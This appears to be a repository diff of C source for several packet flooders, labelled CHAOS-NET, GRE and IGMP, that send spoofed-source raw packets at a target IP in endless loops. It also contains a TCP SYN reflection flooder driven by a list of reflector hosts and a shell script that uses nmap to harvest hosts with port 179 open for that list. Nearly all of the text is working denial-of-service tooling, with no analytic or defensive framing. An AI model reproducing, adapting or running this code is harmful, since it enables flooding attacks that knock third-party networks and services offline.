iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
||||
|
||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
||||
tcph->check = 0;
|
||||
tcph->check = tcpcsum(iph, tcph);
|
||||
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 5){
|
||||
fprintf(stderr, "CHAOS-NET Flooder!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
fprintf(stdout, "Setting up Sockets...\n");
|
||||
|
||||
int num_threads = atoi(argv[2]);
|
||||
int maxpps = atoi(argv[3]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
pthread_t thread[num_threads];
|
||||
|
||||
int multiplier = 100;
|
||||
|
||||
int i;
|
||||
for(i = 0;i<num_threads;i++){
|
||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
||||
}
|
||||
fprintf(stdout, "Starting Flood...\n");
|
||||
for(i = 0;i<(atoi(argv[4])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,213 @@
|
|||
#include <unistd.h>
|
||||
#include <time.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <pthread.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/in.h>
|
||||
#include <netinet/if_ether.h>
|
||||
#include <netdb.h>
|
||||
#include <net/if.h>
|
||||
#include <arpa/inet.h>
|
||||
|
||||
#define MAX_PACKET_SIZE 65534
|
||||
#define PHI 0x9e3779b9
|
||||
|
||||
static unsigned long int Q[4096], c = 362436;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
|
||||
void init_rand(unsigned long int x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
||||
}
|
||||
unsigned long int rand_cmwc(void)
|
||||
{
|
||||
unsigned long long int t, a = 18782LL;
|
||||
static unsigned long int i = 4095;
|
||||
unsigned long int x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int count)
|
||||
{
|
||||
register unsigned long sum = 0;
|
||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
|
||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
||||
|
||||
struct tcp_pseudo
|
||||
{
|
||||
unsigned long src_addr;
|
||||
unsigned long dst_addr;
|
||||
unsigned char zero;
|
||||
unsigned char proto;
|
||||
unsigned short length;
|
||||
} pseudohead;
|
||||
unsigned short total_len = iph->tot_len;
|
||||
pseudohead.src_addr=iph->saddr;
|
||||
pseudohead.dst_addr=iph->daddr;
|
||||
pseudohead.zero=0;
|
||||
pseudohead.proto=IPPROTO_TCP;
|
||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
||||
unsigned short *tcp = malloc(totaltcp_len);
|
||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
||||
unsigned short output = csum(tcp,totaltcp_len);
|
||||
free(tcp);
|
||||
return output;
|
||||
}
|
||||
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = 47; //PROTO 47 GRE
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
|
||||
void setup_tcp_header(struct tcphdr *tcph)
|
||||
{
|
||||
tcph->source = rand();
|
||||
tcph->seq = rand();
|
||||
tcph->ack_seq = rand();
|
||||
tcph->res2 = 0;
|
||||
tcph->doff = 5;
|
||||
tcph->ack = 1;
|
||||
tcph->window = htons(65535);
|
||||
tcph->check = 0;
|
||||
tcph->urg_ptr = 0;
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
char *td = (char *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
||||
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = rand();
|
||||
sin.sin_addr.s_addr = inet_addr(td);
|
||||
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_tcp_header(tcph);
|
||||
|
||||
tcph->dest = rand();
|
||||
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
||||
|
||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
||||
tcph->check = 0;
|
||||
tcph->check = tcpcsum(iph, tcph);
|
||||
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 5){
|
||||
fprintf(stderr, "GRE Flooder!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
fprintf(stdout, "Setting up Sockets...\n");
|
||||
|
||||
int num_threads = atoi(argv[2]);
|
||||
int maxpps = atoi(argv[3]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
pthread_t thread[num_threads];
|
||||
|
||||
int multiplier = 100;
|
||||
|
||||
int i;
|
||||
for(i = 0;i<num_threads;i++){
|
||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
||||
}
|
||||
fprintf(stdout, "Starting Flood...\n");
|
||||
for(i = 0;i<(atoi(argv[4])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,213 @@
|
|||
#include <unistd.h>
|
||||
#include <time.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <pthread.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/in.h>
|
||||
#include <netinet/if_ether.h>
|
||||
#include <netdb.h>
|
||||
#include <net/if.h>
|
||||
#include <arpa/inet.h>
|
||||
|
||||
#define MAX_PACKET_SIZE 65534
|
||||
#define PHI 0x9e3779b9
|
||||
|
||||
static unsigned long int Q[4096], c = 362436;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
|
||||
void init_rand(unsigned long int x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
||||
}
|
||||
unsigned long int rand_cmwc(void)
|
||||
{
|
||||
unsigned long long int t, a = 18782LL;
|
||||
static unsigned long int i = 4095;
|
||||
unsigned long int x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int count)
|
||||
{
|
||||
register unsigned long sum = 0;
|
||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
|
||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
||||
|
||||
struct tcp_pseudo
|
||||
{
|
||||
unsigned long src_addr;
|
||||
unsigned long dst_addr;
|
||||
unsigned char zero;
|
||||
unsigned char proto;
|
||||
unsigned short length;
|
||||
} pseudohead;
|
||||
unsigned short total_len = iph->tot_len;
|
||||
pseudohead.src_addr=iph->saddr;
|
||||
pseudohead.dst_addr=iph->daddr;
|
||||
pseudohead.zero=0;
|
||||
pseudohead.proto=IPPROTO_TCP;
|
||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
||||
unsigned short *tcp = malloc(totaltcp_len);
|
||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
||||
unsigned short output = csum(tcp,totaltcp_len);
|
||||
free(tcp);
|
||||
return output;
|
||||
}
|
||||
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = 2; //PROTO 2 IGMP
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
|
||||
void setup_tcp_header(struct tcphdr *tcph)
|
||||
{
|
||||
tcph->source = rand();
|
||||
tcph->seq = rand();
|
||||
tcph->ack_seq = rand();
|
||||
tcph->res2 = 0;
|
||||
tcph->doff = 5;
|
||||
tcph->ack = 1;
|
||||
tcph->window = htons(65535);
|
||||
tcph->check = 0;
|
||||
tcph->urg_ptr = 0;
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
char *td = (char *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
||||
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = rand();
|
||||
sin.sin_addr.s_addr = inet_addr(td);
|
||||
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_tcp_header(tcph);
|
||||
|
||||
tcph->dest = rand();
|
||||
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
||||
|
||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
||||
tcph->check = 0;
|
||||
tcph->check = tcpcsum(iph, tcph);
|
||||
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 5){
|
||||
fprintf(stderr, "IGMP Flooder!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
fprintf(stdout, "Setting up Sockets...\n");
|
||||
|
||||
int num_threads = atoi(argv[2]);
|
||||
int maxpps = atoi(argv[3]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
pthread_t thread[num_threads];
|
||||
|
||||
int multiplier = 100;
|
||||
|
||||
int i;
|
||||
for(i = 0;i<num_threads;i++){
|
||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
||||
}
|
||||
fprintf(stdout, "Starting Flood...\n");
|
||||
for(i = 0;i<(atoi(argv[4])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,14 @@
|
|||
[ $# -eq 0 ] && { echo "Usage: $0 90 10 10 0-255 THREADS OUTPUT";echo "scanning the ip range 90 would be 90 0-255 0-255 0-255"; exit 1; }
|
||||
[ $# -eq 1 ] && { echo "Forgot Ip range"; exit 1; }
|
||||
[ $# -eq 2 ] && { echo "Forgot Ip range"; exit 1; }
|
||||
[ $# -eq 3 ] && { echo "Forgot Ip range"; exit 1; }
|
||||
[ $# -eq 4 ] && { echo "Forgot threads"; exit 1; }
|
||||
[ $# -eq 5 ] && { echo "Forgot output list :/"; exit 1; }
|
||||
cat motd
|
||||
nmap -oG - -T4 -p179 -v $1.$2.$3.$4 --min-parallelism $threads -host_timeout $timeout | grep "Ports: 179/filtered/tcp//bgp///" > tmp
|
||||
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' tmp > tmp2
|
||||
sed -e 's/$/ 179/' -i tmp2
|
||||
cp tmp2 $6
|
||||
rm -rf tmp*
|
||||
killall -9 nmap
|
||||
echo "Saved as $6"
|
|
@ -0,0 +1,237 @@
|
|||
#include <unistd.h>
|
||||
#include <time.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <pthread.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/in.h>
|
||||
#include <netinet/if_ether.h>
|
||||
#include <netdb.h>
|
||||
#include <net/if.h>
|
||||
#include <arpa/inet.h>
|
||||
|
||||
#define MAX_PACKET_SIZE 8192
|
||||
#define PHI 0x9e3779b9
|
||||
static uint32_t Q[4096], c = 362436;
|
||||
struct list
|
||||
{
|
||||
struct sockaddr_in data;
|
||||
struct list *next;
|
||||
struct list *prev;
|
||||
};
|
||||
struct list *head;
|
||||
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
|
||||
|
||||
void init_rand(uint32_t x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++)
|
||||
{
|
||||
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
|
||||
}
|
||||
}
|
||||
|
||||
uint32_t rand_cmwc(void)
|
||||
{
|
||||
uint64_t t, a = 18782LL;
|
||||
static uint32_t i = 4095;
|
||||
uint32_t x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
|
||||
unsigned short csum (unsigned short *buf, int count)
|
||||
{
|
||||
register unsigned long sum = 0;
|
||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
|
||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
||||
|
||||
struct tcp_pseudo
|
||||
{
|
||||
unsigned long src_addr;
|
||||
unsigned long dst_addr;
|
||||
unsigned char zero;
|
||||
unsigned char proto;
|
||||
unsigned short length;
|
||||
} pseudohead;
|
||||
unsigned short total_len = iph->tot_len;
|
||||
pseudohead.src_addr=iph->saddr;
|
||||
pseudohead.dst_addr=iph->daddr;
|
||||
pseudohead.zero=0;
|
||||
pseudohead.proto=IPPROTO_TCP;
|
||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
||||
unsigned short *tcp = malloc(totaltcp_len);
|
||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
||||
unsigned short output = csum(tcp,totaltcp_len);
|
||||
free(tcp);
|
||||
return output;
|
||||
}
|
||||
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
||||
iph->id = htonl(13373);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = IPPROTO_TCP;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
|
||||
void setup_tcp_header(struct tcphdr *tcph)
|
||||
{
|
||||
tcph->source = htons(5678);
|
||||
tcph->seq = rand();
|
||||
tcph->ack_seq = 0;
|
||||
tcph->res2 = 0;
|
||||
tcph->doff = 5;
|
||||
tcph->syn = 1;
|
||||
tcph->window = htonl(65535);
|
||||
tcph->check = 0;
|
||||
tcph->urg_ptr = 0;
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
struct thread_data *td = (struct thread_data *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin = td->sin;
|
||||
struct list *list_node = td->list_node;
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
bzero(datagram, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_tcp_header(tcph);
|
||||
tcph->source = sin.sin_port;
|
||||
tcph->dest = list_node->data.sin_port;
|
||||
iph->saddr = sin.sin_addr.s_addr;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
int tmp = 1;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
register unsigned int pmk = 0;
|
||||
while(1){
|
||||
if(pmk % 2)
|
||||
{
|
||||
iph->saddr = sin.sin_addr.s_addr;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
tcph->dest = list_node->data.sin_port;
|
||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
||||
tcph->check = 0;
|
||||
tcph->check = tcpcsum(iph, tcph);
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
|
||||
list_node = list_node->next;
|
||||
} else {
|
||||
iph->saddr = list_node->data.sin_addr.s_addr;;
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
||||
tcph->source = list_node->data.sin_port;
|
||||
tcph->dest = sin.sin_port;
|
||||
tcph->check = 0;
|
||||
tcph->check = tcpcsum(iph, tcph);
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
||||
}
|
||||
pmk++;
|
||||
usleep(0);
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 4){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <target port> <reflection file> <throttle> <time (optional)>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
int i = 0;
|
||||
head = NULL;
|
||||
fprintf(stdout, "Setting up Sockets...\n");
|
||||
int max_len = 128;
|
||||
char *buffer = (char *) malloc(max_len);
|
||||
buffer = memset(buffer, 0x00, max_len);
|
||||
int num_threads = atoi(argv[4]);
|
||||
FILE *list_fd = fopen(argv[3], "r");
|
||||
while (fgets(buffer, max_len, list_fd) != NULL) {
|
||||
if ((buffer[strlen(buffer) - 1] == '\n') || (buffer[strlen(buffer) - 1] == '\r')) {
|
||||
buffer[strlen(buffer) - 1] = 0x00;
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct list *)malloc(sizeof(struct list));
|
||||
bzero(head, sizeof(struct list));
|
||||
head->data.sin_addr.s_addr=inet_addr(strtok(buffer, " "));
|
||||
head->data.sin_port=htons(atoi(strtok(NULL, " ")));
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct list *new_node = (struct list *)malloc(sizeof(struct list));
|
||||
bzero(new_node, sizeof(struct list));
|
||||
new_node->data.sin_addr.s_addr=inet_addr(strtok(buffer, " "));
|
||||
new_node->data.sin_port=htons(atoi(strtok(NULL, " ")));
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
pthread_t thread[num_threads];
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons(atoi(argv[2]));
|
||||
sin.sin_addr.s_addr = inet_addr(argv[1]);
|
||||
struct thread_data td[num_threads];
|
||||
for(i = 0;i<num_threads;i++){
|
||||
td[i].thread_id = i;
|
||||
td[i].sin= sin;
|
||||
td[i].list_node = head;
|
||||
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
|
||||
head = head->next;
|
||||
}
|
||||
fprintf(stdout, "Starting Flood...\n");
|
||||
if(argc > 5)
|
||||
{
|
||||
sleep(atoi(argv[5]));
|
||||
} else {
|
||||
while(1){
|
||||
sleep(1);
|
||||
}
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,198 @@
|
|||
/*
|
||||
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
|
||||
*/
|
||||
#include <unistd.h>
|
||||
#include <time.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <pthread.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/in.h>
|
||||
#include <netinet/if_ether.h>
|
||||
#include <netdb.h>
|
||||
#include <net/if.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 4096
|
||||
#define PHI 0x9e3779b9
|
||||
static unsigned long int Q[4096], c = 362436;
|
||||
static unsigned int floodport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
void init_rand(unsigned long int x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
||||
}
|
||||
unsigned long int rand_cmwc(void)
|
||||
{
|
||||
unsigned long long int t, a = 18782LL;
|
||||
static unsigned long int i = 4095;
|
||||
unsigned long int x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int count)
|
||||
{
|
||||
register unsigned long sum = 0;
|
||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
